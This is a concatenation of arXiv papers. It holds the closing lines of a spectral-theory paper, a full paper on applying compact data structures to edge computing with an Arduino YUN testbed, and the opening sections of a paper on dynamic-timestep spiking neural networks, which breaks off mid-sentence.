\(\mathfrak{h}_{\mathrm{N}}[v]\leq\lambda\|v\|_{L^{2}(\Omega)}^{2}\) valid for any \(v\in\mathcal{K}\) combined with the min-max characterisation (2.4) for the eigenvalues of the biharmonic operator with Neumann boundary conditions that \(\mu_{k+d+1}\leq\lambda_{k}\) for any \(k\in\mathbb{N}\). **Acknowledgement** The author gratefully acknowledges the support by the grant No. 21-07129S of the Czech Science Foundation.
2306.01074
When Edge Computing Meets Compact Data Structures
Edge computing enables data processing and storage closer to where the data are created. Given the largely distributed compute environment and the significantly dispersed data distribution, there are increasing demands of data sharing and collaborative processing on the edge. Since data shuffling can dominate the overall execution time of collaborative processing jobs, considering the limited power supply and bandwidth resource in edge environments, it is crucial and valuable to reduce the communication overhead across edge devices. Compared with data compression, compact data structures (CDS) seem to be more suitable in this case, for the capability of allowing data to be queried, navigated, and manipulated directly in a compact form. However, the relevant work about applying CDS to edge computing generally focuses on the intuitive benefit from reduced data size, while few discussions about the challenges are given, not to mention empirical investigations into real-world edge use cases. This research highlights the challenges, opportunities, and potential scenarios of CDS implementation in edge computing. Driven by the use case of shuffling-intensive data analytics, we proposed a three-layer architecture for CDS-aided data processing and particularly studied the feasibility and efficiency of the CDS layer. We expect this research to foster conjoint research efforts on CDS-aided edge data analytics and to make wider practical impacts.
Zheng Li, Diego Seco, José Fuentes-Sepúlveda
2023-06-01T18:22:59Z
http://arxiv.org/abs/2306.01074v1
# When Edge Computing Meets Compact Data Structures ###### Abstract Edge computing enables data processing and storage closer to where the data are created. Given the largely distributed compute environment and the significantly dispersed data distribution, there are increasing demands of data sharing and collaborative processing on the edge. Since data shuffling can dominate the overall execution time of collaborative processing jobs, considering the limited power supply and bandwidth resource in edge environments, it is crucial and valuable to reduce the communication overhead across edge devices. Compared with data compression, compact data structures (CDS) seem to be more suitable in this case, for the capability of allowing data to be queried, navigated, and manipulated directly in a compact form. However, the relevant work about applying CDS to edge computing generally focuses on the intuitive benefit from reduced data size, while few discussions about the challenges are given, not to mention empirical investigations into real-world edge use cases. This research highlights the challenges, opportunities, and potential scenarios of CDS implementation in edge computing. Driven by the use case of shuffling-intensive data analytics, we proposed a three-layer architecture for CDS-aided data processing and particularly studied the feasibility and efficiency of the CDS layer. We expect this research to foster conjoint research efforts on CDS-aided edge data analytics and to make wider practical impacts. collaborative data analytics; communication overhead; compact data structure; data shuffling; edge computing ## I Introduction Edge computing is a modern distributed computing paradigm that brings data processing and storage closer to the network edge where the data are generated. Given the pervasive and heterogeneous edge and user devices, both the deployment environment and the runtime topology can be more distributed than ever for edge applications [1]. Correspondingly, it has been envisioned that the demands of data sharing and collaborative processing will dramatically increase on the edge [2]. For example, in the field of edge intelligence, to label cross-region data for training AI models, the preprocessing of distributed raw data will be needed by employing data-parallel frameworks like MapReduce [3]. It should be noted that the data-parallel processing can be data-shuffling intensive. In cluster computing, the data shuffling between computation stages accounts for more than half of the completion times of MapReduce and Dryad jobs [4]. In Amazon cloud, data communication at the shuffling stage can even take up to 70% of the overall execution time of self-join applications [5]. Considering the limited power supply for wireless equipment and the limited bandwidth resource in the edge environments, such excessive communication loads will inevitably lead to threats not only to the time critical requirement of edge computing but also to the battery life of edge devices. Therefore, it is crucial and valuable to investigate practical approaches to reducing the communication overhead in edge data analytics. A straightforward strategy of reducing the amount of data that need to be transmitted over a network is to employ data compression techniques [6]. However, this strategy is mainly suitable for one-off data transmission scenarios, as data decompression is generally required to utilize the compressed data, no matter in case of lossy compression or lossless compression. 
When it comes to shuffling-intensive data analytics, the extremely frequent data compression and decompression will explosively increase the computation workloads, which will not pay off the reduced communication overhead. Compared with data compression, the techniques of compact data structures (CDS) can not only maintain data with less space, but they also enable the data to be queried, navigated, and manipulated directly in their compact form, i.e. without being decompressed [7]. Such a decompression-free feature makes CDS particularly promising to fit in the scenario of space-sensitive data analytics. As a matter of fact, CDS techniques have been successfully applied to many big data areas (e.g., bioinformatics [8]). However, there exist various challenges in applying CDS to edge computing. For example, despite the reduced data size, the construction of CDS is still space hungry, which may not be affordable for resource-limited devices. Although the edge computing community has noticed and recognized the benefits of CDS, the current discussions about employing CDS techniques are superficial and ad hoc [9], not to mention the lack of empirical experience reports and case studies. To help gain deeper understanding of, and obtain the first-hand experience in, applying CDS to edge computing, we firstly brainstormed a set of challenges and opportunities in practice, and then adopted Arduino YUN Rev2 as a representative edge device to investigate CDS-aided data analytics implementations. This paper reports our current work with a twofold contribution. * For researchers, our discussions about the challenges and opportunities of applying CDS to edge computing can act as a bridge between these two communities, to foster conjoint research efforts on the topic of CDS-aided edge data analytics. * For practitioners, our empirical study demonstrates the feasibility and potential efficiency of implementing CDS-aided edge data analytics. The three-layer architecture proposed in our study can be adapted to more use cases on the edge. The remainder of this paper is organized as follows. Section II summarizes our brainstormed challenges, opportunities, and two main implementation scenarios of applying CDS to edge computing. Section III describes our empirical study that mainly focuses on the CDS layer at this current stage. Conclusions are drawn in Section IV together with our future work plans. ## II Challenges and Opportunities of Applying CDS to Edge Computing ### _Major Challenges_ Although the benefit from compact while still operable data is intuitively straightforward, applying CDS to edge computing may have various challenges in practice. * **The construction of CDS is space hungry.** As a cost of enabling data operations in the reduced space, extra runtime space is needed for constructing CDS. Despite active research efforts in the last few years, many CDS require a large construction space (that may be tremendously larger than the constructed results). Given those IoT devices with limited storage capabilities (e.g., the embedded RAM is only 4KB for current taxi-mounted GPS devices), the construction of CDS will be one of the top challenges on the edge. * **The dynamism of CDS construction increases the computational complexity.** To address the space limit, an alternative strategy is to dynamically construct CDS via update operations for chunk-by-chunk datasets. Take our empirical study as an example (cf. 
Section III-A), instead of constructing and maintaining a full dictionary to encode data, we can let edge devices build up and continuously update a dictionary subset for data encoding. Unfortunately, this strategy will inevitably increase the computing overhead on the edge. Moreover, although CDS aims to eliminate as much redundancy as possible, such a CDS dynamism requires redundant information to allow update operations and to make dynamic CDS constructions compatible with each other. In fact, it has been revealed that the dynamic versions of typical CDS techniques do not achieve more remarkable performance than their static versions [7]. * **Distributed CDS constructions may incur CDS inconsistency issues.** Given the largely dispersed data distribution on the edge, CDS constructions should also be arranged on distributed edge devices, in order collaboratively to satisfy the needs of compact data consumption. When heterogeneous data and dynamism are involved in the distributed CDS constructions, the update operations can make the constructed CDS inconsistent on different edge devices. To our best knowledge, this challenge has not been well studied even in the CDS community. A possible solution is to develop a CDS transmission mechanism. One device can transmit its CDS (or a part of it via split/filter operation) to another device, or even to a centralized CDS server. The receivers will be able to merge different CDS versions and synchronize the others with a consolidated version. ### _Promising Opportunities_ As long as CDS is implementable on suitable edge devices (by tolerating, bypassing, relieving or addressing the aforementioned challenges), we argue that it can bring at least two main benefits to edge computing, as explained below. * **Reducing the communication overhead in shuffling-intensive edge data analytics.** Data shuffling is a crucial component in collaborative data analytics across multiple compute nodes (e.g., MapReduce). As mentioned previously, data communication at the shuffling stage can dominate the overall execution time of distributed computing jobs [4, 5]. However, such a communication overhead can result in violations of the low-latency requirements of edge computing. In fact, it has been identified that data shuffling has become a bottleneck for edge data analytics [10]. By applying CDS, the largely reduced data size will significantly reduce the communication overhead of data shuffling. It should be noted that the data compression techniques could not be applicable in this case, as data shuffling always comes with intermediate data processing, while the compressed data would not be able to be processed directly. * **Extending the battery life of edge devices.** Unless using wired power supply, the usage of edge devices is mainly constrained by their battery capacities, while there is still a tremendous gap between battery technologies and power requirements due to the inherent complexity in the relevant interdisciplinary topics (e.g., thermodynamics and fluid mechanics) [11]. Meanwhile, given the massively growing IoT and the increasing popularity of over-the-top mobile applications (e.g., instant messaging), signaling energy consumption has become a major concern on the edge [12]. Therefore, the data transmission among edge devices should take into account not only offering high throughput and low latency, "but also conserving precious battery energy to prolong operational lifetime" [13]. 
Considering the benefit of maintaining the same data usability after reducing the data size, CDS-aided data transmission can be a promising strategy to extend the battery life of relevant edge devices. ### _Potential Implementation Scenarios_ When it comes to practically implementing CDS techniques on edge devices, we distinguish between two main implementation scenarios. * **Static CDS based on prior knowledge.** In this case, the CDS can be constructed in advance based on pre-known regular patterns or domain-specific knowledge, and correspondingly the compact counterpart of the original data form will have been predefined. At runtime, the constructed CDS can act as a static transformer to convert original data to their compact versions seamlessly. This scenario is exemplified by a pre-established lookup table in our empirical study (cf. Section III-A). * **Dynamic CDS based on runtime knowledge.** In this case, the prerequisite information for constructing CDS is unavailable until the data to be converted are received at runtime, and frequent CDS reconstructions may be needed due to possibly continuous information updates (e.g., the price distribution of Amazon's spot service). It is clear that such a scenario would also suffer from the dynamism challenge of CDS construction, although we could employ buffers to facilitate the storage of new data and the reconstruction of CDS. In practice, a possible workaround is to accumulate and take advantage of the posterior knowledge (e.g., the price distribution may exist only in a limited range), to reduce the frequency of CDS reconstruction. ## III An Empirical Investigation Instead of arguing specific CDS techniques (e.g., bitvectors, wavelet trees, \(k\)-page graph, etc.) [7], this research aims to bring us empirical experience in applying CDS to edge computing in a generic sense. Therefore, we decided to firstly propose a generic edge computing scenario that involves CDS, in order to better drive our experimental investigation. In this scenario, we design a three-layer architecture for conducting suitable data analytic tasks at the edge side, as illustrated in Figure 1. In detail, while receiving raw data, edge devices at the first layer choose suitable CDS techniques to transform the raw data, and continuously feed the second layer with data in a compact form. A group of second-layer devices perform data analytics in a collaborative and distributed manner, without even being aware of the original data form. Depending on the requirement, the data analytical results can be output directly or be switched back to the plain form. Thus, the third layer is optional in case the reverse data transformation is needed. As for the data analytic tasks, we refer to our previous work on characterizing Amazon's spot service pricing [14]. Naturally, the whole system will need to be re-implemented and deployed in the edge environment. More importantly, the workflow will need to be adapted to the three-layer architecture designed in this research, and using compact price records instead of original price history to realize the characterization. Driven by the aforementioned concerns about edge resource constraints when applying CDS, we only focus on the first layer in this paper. 
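To make the role of the first (CDS) layer concrete, the following is a minimal Python sketch of the "static CDS based on prior knowledge" scenario described above: a pre-established lookup table converts each incoming record into a compact form that the second layer can consume directly, and an optional inverse mapping supports the third layer. The class and field names here are ours, chosen purely for illustration; they are not taken from the paper's implementation.

```python
class StaticCDSLayer:
    """First-layer transformer under the static CDS scenario (illustrative only)."""

    def __init__(self, code_table):
        # code_table maps each pre-known categorical value to a small integer code.
        self.code_table = code_table
        self.inverse = {code: value for value, code in code_table.items()}

    def encode(self, record):
        # record = (categorical_key, numeric_payload); only the key is re-coded,
        # so the second layer can still filter/aggregate on the payload directly.
        key, payload = record
        return (self.code_table[key], payload)

    def decode(self, compact_record):
        # Optional third-layer step: restore the original categorical value.
        code, payload = compact_record
        return (self.inverse[code], payload)


# Toy usage: three pre-known categories, a small stream of incoming records.
layer_one = StaticCDSLayer({"type-a": 0, "type-b": 1, "type-c": 2})
stream = [("type-b", 0.031), ("type-a", 0.027)]
compact_stream = [layer_one.encode(r) for r in stream]   # [(1, 0.031), (0, 0.027)]
```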
### _Selecting Suitable CDS Techniques_ Given the spot service prices downloadable from Amazon (each record includes the tag, price, timestamp, instance type, operating system, and AWS zone, as exemplified in Figure 2), we see four strategies to make the original data compact, as follows: * **Filtering out redundant data components.** In the context of spot service, the price record tag "SPOTINSTANCEPRICE" never changes, and the last two digits of the prices are always 0. Thus, we can directly ignore them when reading the data. Since Amazon adopts UTC by default [15], the UTC offset part (i.e. "+0000") of the timestamp can also be removed. * **Delta encoding data via differential compression.** The differential strategy is widely shared between compression techniques and CDS techniques. In our case study, this strategy is particularly suitable to reduce the size of continuous timestamps. By setting a base timestamp, the following timestamps can be represented as their differences against the base one. In practice, multiple base timestamps with suitable intervals can be used to control the maximum time difference. * **Using prior knowledge to encode data.** Amazon defines its unique service (EC2) instances via a composite key that is made up of instance type, operating system and AWS zone. These three attributes all have fixed numbers of values (i.e. 402 types, eight systems, and 56 zones respectively) [15]. Benefiting from this prior knowledge, we can encode those unique service instances (e.g., into Huffman codes), and then store the codes in bitvectors. * **Using posterior knowledge to encode data.** Although the spot pricing mechanism delivers dynamic prices at runtime, each service instance's price varies only in a limited range. Considering that the pricing characterization will deliver a price distribution (as demonstrated in [14]), after data analytics, we can utilize the price distribution to further encode the price numbers and in turn improve the CDS efficiency in future characterization work. Figure 1: The three-layer architecture for CDS-aided edge data analytics. (_Each blue rectangle indicates an edge device._) The first two strategies are straightforward to implement. Particularly, to make the demonstration reader-friendly in this paper, we still keep the base timestamps in the human-readable format. In contrast, since the data analytics layer is out of our current research scope, the fourth strategy is not implemented in this study. When implementing the third strategy, for the purpose of conciseness and for the ease of replication, we decided to use sequential numbers instead of binary codes to represent and integrate the available information of instance types, operating systems and AWS zones. In fact, there is always a CDS trade-off between "good space performance of bitwise codes and the good time performance of bytewise codes" [7]. Eventually, we established a lookup table for Arduino YUN Rev2 to encode incoming data. ### _Setting Up the Testbed_ By sticking to the CDS layer, our experimental logic is focused on an edge device that can receive plain spot prices and transmit their compact version. Accordingly, we follow the client-server model to architect and build up the testbed, as shown in Figure 3 and explained below. * **A Wireless Router:** We work in a stable WiFi environment via a TP-Link Realtek RTL8821CE 802.11ac PCIe Adapter that transmits and receives data on the frequency 2.4 GHz and at the speed 150 Mbps.
* **An Arduino YUN Rev2:** To represent typical edge device features, we choose an Arduino YUN Rev2 that has built-in Ethernet and WiFi support. In particular, we intentionally utilize its limited storage and compute capacities by sticking to its native sketch side for all the experiments. Correspondingly, the aforementioned CDS strategies are implemented as Arduino sketch program. * **An HTTP Server:** Since the sketch side of Arduino YUN Rev2 does not have enough power to handle HTTPS connections, we set up a simple HTTP server on a Windows 10 desktop to simulate the data source, by hosting various sizes of Amazon's spot service pricing history files. * **A Client:** To facilitate our observations and measurements, we issue data requests through a client Python program deployed on a Windows 10 laptop. Each client request triggers a cascade Arduino request to the HTTP server, while the eventual response will be the CDS processing results instead of the raw data. Figure 3: The testbed used in our experimental investigation. Figure 2: Original spot service price records downloadable from Amazon. The columns from left to right are: Tag, Price, Timestamp, Instance Type, Operating System, AWS Zone. ### _Experimental Design and Implementation_ Since the resource limit is the major concern for applying CDS on edge devices (cf. Section II), we have prepared a set of data files ranging from 5 to 1000 price records to try gradually squeezing the capacity of Arduino YUN Rev2. For each data file hosted on the HTTP server, we issue multiple requests and measure the average wall-clock latency from the client. In particular, the data processing latencies on Arduino YUN Rev2 are measured via the sketch code millis(); and also returned to the client. It should be noted that both the cascade request time and the response time have been excluded from the measurement of data processing latency. The data processing here is to apply the CDS strategies to the original price records, as discussed in Section III-A. To improve the replicability of this research, we share the source files online1 and describe the main steps as follows. Footnote 1: [https://www.doi.org/10.5281/zenodo.5149326](https://www.doi.org/10.5281/zenodo.5149326) 1. Launch the HTTP server, and keep note of the server's IP address and port number. 2. Update the read_file() function in the sketch code with the noted IP address and port number. 3. Power on Arduino YUN Rev2 and upload the updated sketch code to it. 4. Inject the pre-established lookup table as key-value pairs to Arduino YUN Rev2. 5. Issue client requests to obtain spot price data and latency measurement results. ### _Experimental Results and Analyses_ After going through the CDS conversion, the original price records demonstrated in Figure 2 will become as compact as shown in Figure 4. Due to the known timeout issue2, in our tests, Arduino YUN Rev2 can barely cope with data beyond 650 price records for one request. Therefore, we only conducted experiments with data amounts up to 650 records. The experimental results corresponding to different data sizes are exemplified in Table I. Footnote 2: [https://github.com/espressif/arduino-esp32/issues/1433](https://github.com/espressif/arduino-esp32/issues/1433) Note that in addition to the predesigned experiments (cf. Section III-C), we also measured baseline latencies, by treating Arduino YUN Rev2 as a relay. 
To avoid relaying data byte by byte, we let Arduino YUN Rev2 cache the incoming bytes and transmit individual records to the client. As such, we define the caching overhead as the non-CDS processing latency and distinguish it from the non-CDS wall-clock latency. From the numerical results in Table I, it is unsurprising to see that the CDS processing always takes more time than its corresponding baseline. According to the No-Free-Lunch theorem [16], the expected communicational benefit in the data analytics layer inevitably requires the computational cost in the CDS layer. However, when the data size is small (e.g., the record amount is 12 or 25), CDS seems to be able to bring extra benefits for the data communication, i.e. the reduced data size also lowers the wall-clock latency. To facilitate the observation, we further visualize the latency difference between the CDS and the non-CDS scenarios, as shown in Figure 5. Figure 4: Human-readable compact form of the sample data after the CDS conversion. (_In production, the bitwise machine-readable form can be more compact._) Figure 5: Latency difference between the CDS and the non-CDS scenarios. \[\frac{\text{Computation}}{\text{Communication}}=\frac{\text{Processing Latency}}{\text{ Wall-clock Latency }-\text{Processing Latency}} \tag{1}\] Benefiting from the visualization, it is not only clear that the latency difference keeps increasing along with the growth of data size, but that the processing latency difference increases significantly faster than the wall-clock latency difference. In other words, by referring to Eq. (1), the computation-to-communication ratio will become higher and higher when the CDS workload increases. Recall that distributed systems generally favor high computation-to-communication ratio for various purposes, ranging from efficient resource utilization to improved scalability [17]. From the perspective of a whole analytic task, we should reasonably maximize the transactional workloads on CDS processing units, while ignoring the aforementioned trivial extra benefits from small data sizes. ## IV Conclusions and Future Work By compacting data while still allowing the data to be queried, navigated, and manipulated without decompressing them, the CDS techniques are particularly promising for collaborative data analytics on the edge. However, applying CDS to edge computing may suffer from various challenges in different implementation scenarios. We argue that conjoint research efforts from relevant communities should be made to boost the emerging area of CDS-aided edge data analytics. After prototyping the static CDS implementation on an Arduino YUN Rev2, our future work will be unfolded along two directions. Firstly, we will extend this prototyping work to the data analytics layer and empirically study the impacts of the current CDS implementation. Secondly, we will start investigating dynamic CDS techniques in more complex use cases on the edge.
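As a supplementary illustration of the record compaction described in Section III-A, the following minimal Python sketch applies the first three strategies (dropping redundant components, delta-encoding the timestamp, and lookup-encoding the instance key) to a single spot price record. The sample record values, the base timestamp, and the lookup code below are invented for demonstration; they are not taken from the authors' lookup table or sketch code.

```python
from datetime import datetime, timezone

# Hypothetical lookup table: (instance type, OS, AWS zone) -> small integer code.
LOOKUP = {("m3.medium", "Linux/UNIX", "us-east-1a"): 17}

# One illustrative base timestamp (Amazon reports prices in UTC by default).
BASE_TS = datetime(2021, 5, 1, 0, 0, 0, tzinfo=timezone.utc)

def compact(record):
    tag, price, ts, itype, osys, zone = record
    # Strategy 1: ignore the constant tag, the always-zero trailing price digits,
    # and the "+0000" UTC offset of the timestamp.
    price = round(float(price), 4)
    # Strategy 2: delta-encode the timestamp against the base timestamp (in seconds).
    delta = int((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z") - BASE_TS).total_seconds())
    # Strategy 3: replace the (type, OS, zone) composite key by its lookup code.
    code = LOOKUP[(itype, osys, zone)]
    return (price, delta, code)

rec = ("SPOTINSTANCEPRICE", "0.031500", "2021-05-01T09:30:00+0000",
       "m3.medium", "Linux/UNIX", "us-east-1a")
print(compact(rec))   # -> (0.0315, 34200, 17)
```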
2305.17346
Input-Aware Dynamic Timestep Spiking Neural Networks for Efficient In-Memory Computing
Spiking Neural Networks (SNNs) have recently attracted widespread research interest as an efficient alternative to traditional Artificial Neural Networks (ANNs) because of their capability to process sparse and binary spike information and avoid expensive multiplication operations. Although the efficiency of SNNs can be realized on the In-Memory Computing (IMC) architecture, we show that the energy cost and latency of SNNs scale linearly with the number of timesteps used on IMC hardware. Therefore, in order to maximize the efficiency of SNNs, we propose input-aware Dynamic Timestep SNN (DT-SNN), a novel algorithmic solution to dynamically determine the number of timesteps during inference on an input-dependent basis. By calculating the entropy of the accumulated output after each timestep, we can compare it to a predefined threshold and decide if the information processed at the current timestep is sufficient for a confident prediction. We deploy DT-SNN on an IMC architecture and show that it incurs negligible computational overhead. We demonstrate that our method only uses 1.46 average timesteps to achieve the accuracy of a 4-timestep static SNN while reducing the energy-delay-product by 80%.
Yuhang Li, Abhishek Moitra, Tamar Geller, Priyadarshini Panda
2023-05-27T03:01:27Z
http://arxiv.org/abs/2305.17346v1
# Input-Aware Dynamic Timestep Spiking Neural Networks for Efficient In-Memory Computing ###### Abstract Spiking Neural Networks (SNNs) have recently attracted widespread research interest as an efficient alternative to traditional Artificial Neural Networks (ANNs) because of their capability to process sparse and binary spike information and avoid expensive multiplication operations. Although the efficiency of SNNs can be realized on the In-Memory Computing (IMC) architecture, we show that the energy cost and latency of SNNs scale linearly with the number of timesteps used on IMC hardware. Therefore, in order to maximize the efficiency of SNNs, we propose input-aware Dynamic Timestep SNN (DT-SNN), a novel algorithmic solution to dynamically determine the number of timesteps during inference on an input-dependent basis. By calculating the entropy of the accumulated output after each timestep, we can compare it to a predefined threshold and decide if the information processed at the current timestep is sufficient for a confident prediction. We deploy DT-SNN on an IMC architecture and show that it incurs negligible computational overhead. We demonstrate that our method only uses 1.46 average timesteps to achieve the accuracy of a 4-timestep static SNN while reducing the energy-delay-product by 80%. Spiking neural networks, in-memory computing, dynamic inference ## I Introduction Deep learning has revolutionized many challenging computational tasks such as computer vision and natural language processing [10] using Artificial Neural Networks (ANNs). These successes, however, have come at the cost of tremendous computing resources and high latency [6]. Over the past decade, Spiking Neural Networks (SNNs) have gained popularity as an energy-efficient alternative to ANNs [14, 17]. SNNs are different from ANNs in that they process inputs over a series of timesteps, whereas ANNs infer over what can be considered a single timestep. The biologically-plausible neurons in SNNs maintain a variable called membrane potential, which controls the behavior of the SNN over a series of timesteps. When the membrane potential exceeds a certain threshold, the neuron fires, creating a spike, and otherwise, the neuron remains inactive (neuron outputs a 0 or 1). Such spike-based computing creates sparsity in the computations and replaces multiplications with additions. Although the binary spike nature of SNNs eliminates the need for multiplications, compared to ANNs, SNNs require significantly more memory access due to multi-timestep computations on traditional von-Neumann architectures (called the "memory wall problem") [21]. To alleviate this problem, In-Memory Computing (IMC) hardware is used to perform analog dot-product operations to achieve high memory bandwidth and compute parallelism [15]. In this work, we mainly focus on achieving lower energy and latency in the case of IMC-implemented SNNs while maintaining iso-accuracy. Fig. 1(A) shows a component-wise energy distribution for the CIFAR10-trained VGG-16 network on 64\(\times\)64 4-bit RRAM IMC architecture. Among these, the digital peripherals (containing crossbar input switching circuits, buffers, and accumulators) entail the highest energy cost (45%). The IMC-crossbar and analog-to-digital converter (ADC) consumes the second highest energy (25%). Efforts to lower energy consumption have been made by previous works. 
As an example, prior IMC-aware algorithm-hardware co-design techniques [13, 22] have used pruning and quantization to reduce the ADC and crossbar energy and area cost. However, in the case of SNNs, the improvement is rather limited because the crossbar and ADC only occupy 25% of the overall energy cost. Unlike ANNs, the number of timesteps in SNNs plays an important role in hardware performance, which is orthogonal to data precision or sparsity. In Fig. 1(B) we investigate how timesteps affect the energy consumption and latency of an SNN. Note that both metrics are normalized to the performance of a 1-timestep SNN. We find that both energy consumption and latency scale linearly with the number of timesteps, up to \(4.9\times\) more energy and \(8\times\) more latency when changing the number of timesteps from 1 to 8. More importantly, if one can reduce the number of timesteps in SNNs, then all parts in Fig. 1(A) can benefit from the energy and latency savings. These findings highlight the tremendous potential to optimize SNNs' performance on IMC hardware. Fig. 1: Energy estimation on our IMC architecture using VGG-16 on CIFAR-10 dataset. (A) energy ratio of each unit, (B) energy/latency vs. timesteps. In fact, [3, 8, 12] have explored ways to reduce the number of timesteps from an algorithmic perspective. They all train an SNN with a high number of timesteps first and then finetune the model with fewer timesteps later. However, their method decreases the number of timesteps for all input samples, thereby inevitably leading to an accuracy-timestep trade-off. In this paper, we tackle this problem with another solution. _We view the number of timesteps during inference as a variable conditional to each input sample._ We call our method Dynamic Timestep Spiking Neural Network (DT-SNN) as it varies the number of timesteps based on each input sample. In particular, we use entropy thresholding to determine the appropriate number of timesteps for each sample. To further optimize our algorithm in practice, we design a new training loss function and implement our algorithm on an IMC architecture. The main contributions of our work are summarized below: 1. To the best of our knowledge, this is the first work that changes the number of timesteps in SNNs based on the input, reducing computational overhead and increasing inference efficiency without compromising task performance. 2. To achieve that goal, we propose using entropy thresholding to distinguish the number of timesteps required. Meanwhile, we also provide a new training loss function and an IMC implementation of our method. 3. Extensive experiments are carried out to demonstrate the efficacy and efficiency of DT-SNN. For example, the DT-SNN ResNet-19 achieves the same accuracy as the 4-timestep SNN ResNet-19 with an average of only 1.27 timesteps on the CIFAR-10 dataset, reducing the energy-delay-product by 84%. ## II Preliminaries We start by introducing the basic background of SNNs. We denote the overall spiking neural network as a function \(f_{T}(\mathbf{x})\) (\(\mathbf{x}\) is the input image); its forward propagation can be formulated as \[\mathbf{y}=f_{T}(\mathbf{x})=\frac{1}{T}\sum_{t=1}^{T}h\circ g^{L}\circ g^{L-1}\circ g^{L-2}\circ\cdots g^{1}(\mathbf{x}), \tag{1}\] where \(g^{\ell}(\mathbf{x})=\mathrm{LIF}(\mathbf{W}^{\ell}\mathbf{x})\) denotes the \(\ell\)-th block. A block contains a convolutional layer, a leaky integrate-and-fire (LIF) layer, and an optional normalization layer placed in between the former two layers [23].
\(L\) represents the total number of blocks in the network and \(h(\cdot)\) denotes the final linear classifier. In this work, we use the direct encoding method, i.e., using \(g^{1}(\mathbf{x})\) to encode the input tensor into spike trains, as done in recent SNN works [20]. To get the final prediction, we repeat the inference process \(T\) times and average the output from the classifier. SNNs emulate the biological neurons using LIF layers. For each timestep, the input current charges the membrane potential \(\mathbf{u}\) in the LIF neurons. When the membrane potential exceeds a certain threshold, a spike \(\mathbf{s}\) will be fired to the next layer, given by \[\mathbf{u}^{\ell}[t+1]=\tau\mathbf{u}^{\ell}[t]+\mathbf{W}^{\ell}\mathbf{s}^{\ell}[t], \tag{2}\] \[\mathbf{s}^{\ell+1}[t+1]=\begin{cases}1&\text{if }\mathbf{u}^{\ell}[t+1]>V_{th}\\ 0&\text{otherwise}\end{cases}, \tag{3}\] where \(\tau\in(0,1]\) is the leaky factor, mimicking the potential decay. If a spike is fired, the membrane potential will be reset to 0, _i.e._\((\mathbf{u}[t+1]=\mathbf{u}[t+1]*(1-\mathbf{s}[t+1]))\). In the spiking neurons, all functions except the spike firing function (Eq. (3)) can be normally differentiated. The firing function generates a 0 gradient if \(\mathbf{u}^{\ell}[t+1]\neq V_{th}\), otherwise, it generates a gradient with infinity. This impedes the gradient-based optimization in SNNs. To overcome this problem, we leverage the surrogate gradient training method [19]. Specifically, in the forward propagation, we keep the original LIF neuron dynamics, while in the backward propagation, we use another function: \[\frac{\partial\mathbf{s}^{\ell}[t]}{\partial\mathbf{u}^{\ell}[t]}=\max(0,V_{th}-|\mathbf{u}^{\ell}[t]-V_{th}|) \tag{4}\] ## III Methodology In this section, we first introduce the algorithm for our work. Then we demonstrate the hardware implementation of DT-SNN. ### _Dynamic Timestep Spiking Neural Network_ Because spikes in an SNN are sparse and binary, the number of timesteps, therefore, controls the density of information inside the SNNs. Generally, more timesteps help SNNs explore more temporal information and thus achieve higher task performance. Fig. 2 demonstrates that when the number of timesteps of an SNN VGG-16 is increased from 1 to 4 during inference, the accuracy increases as well. Fig. 2: The impact of the number of timesteps on the accuracy. We test the spiking VGG-16 on three datasets (CIFAR10, CIFAR100, TinyImageNet). Together with the hardware performance as shown in Fig. 1(B), the number of timesteps \(T\) controls a trade-off between hardware performance and task performance on an SNN model \(f_{T}(\cdot)\). Unlike the conventional approach where \(T\) is selected and fixed for all images, we propose a conditional probability of selecting \(T\) for different input \(\mathbf{x}\). We call our method the Dynamic Timestep Spiking Neural Network (DT-SNN). More concretely, denote \(\mathbb{P}(T|\mathbf{x})\) as the conditional probability of \(T\) with respect to \(\mathbf{x}\), DT-SNN is given by \[f_{\widehat{T}\sim\mathbb{P}(T|\mathbf{x})}=\frac{1}{\widehat{T}}\sum_{t=1}^{\widehat{T}}h\circ g^{L}\circ g^{L-1}\circ g^{L-2}\circ\cdots g^{1}(\mathbf{x}). \tag{5}\] DT-SNN allows allocating a different number of timesteps for each input sample. As seen in Fig. 2, we find that the majority of samples can be correctly classified with fewer timesteps. For example, on the CIFAR-100 dataset, 69.39% of overall test data can be correctly predicted using only 2 timesteps.
Yet only 2.9% of test data needs full timesteps (\(T=4\)) to get the right prediction. If we compare the hardware performance, the 4-timestep model brings 86% more energy consumption and 100% more latency than the 2-timestep model. This observation is also applicable to other datasets like CIFAR10 and TinyImageNet. Choosing the Right \(T\)Our objective in DT-SNN is to reduce the unnecessary timesteps as much as possible while not compromising accuracy. However, finding the appropriate timestep for each input data is non-trivial. In this work, we use entropy to determine \(T\). Formally, given a dataset that has \(K\) classes, the prediction probability \(\pi(\mathbf{y}|\mathbf{x})\) is calculated by the Softmax function \((\sigma(\cdot))\), given by \[\pi(\mathbf{y}_{i}|\mathbf{x})=\sigma_{\mathrm{i}}(f(\mathbf{x}))=\frac{\exp(f(\mathbf{x})_{i} )}{\sum_{j=1}^{K}\exp(f(\mathbf{x})_{j})}, \tag{6}\] where \(\pi(\mathbf{y}_{i}|\mathbf{x})\) is the probability of predicting \(i\)-th class. The entropy can be further calculated by \[E_{f}(\mathbf{x})=-\frac{1}{\log K}\sum_{i=1}^{K}\pi(\mathbf{y}_{i}|\mathbf{x})\log\pi(\bm {y}_{i}|\mathbf{x}). \tag{7}\] Here, \(\log K\) ensures the final entropy is normalized to \((0,1]\). The entropy measures the state of uncertainty. For instance, if all classes have an equal probability of \(\frac{1}{K}\), the entropy will become 1, meaning the current state is completely random and uncertain. Instead, if one class's probability is approaching 1 while others are approaching 0, the entropy moves towards 0, indicating the state is becoming certain. Generally, the prediction accuracy is highly correlated with entropy. If the model is certain about some inputs (low entropy), the prediction would be highly probable to be correct, and vice versa [5]. Therefore, we select the \(T\) if the entropy is lower than some pre-defined threshold \(\theta\), given by \[\hat{T}(\mathbf{x})=\operatorname*{arg\,min}_{\hat{T}}\{E_{f_{T}}(\mathbf{x})<\theta| 1\leq\hat{T}<T\}\cup\{T\}. \tag{8}\] Here, the \(\hat{T}\) is selected based on the lowest timestep that can have lower-than-\(\theta\) entropy. If none of them can have confident output, the SNN will use maximum timesteps, _i.e._, \(T\). Training DT-SNNOriginally, the loss function for training an SNN is the cross-entropy function, given by: \[\mathcal{L}(\mathbf{x},\mathbf{z})=-\frac{1}{B}\sum_{i=1}^{K}\mathbf{z}_{i}\log\pi(f_{T}( \mathbf{x})_{i}|\mathbf{x}), \tag{9}\] where \(\mathbf{z}\) is the label vector and \(B\) is the batch size. Although the output from lower timesteps 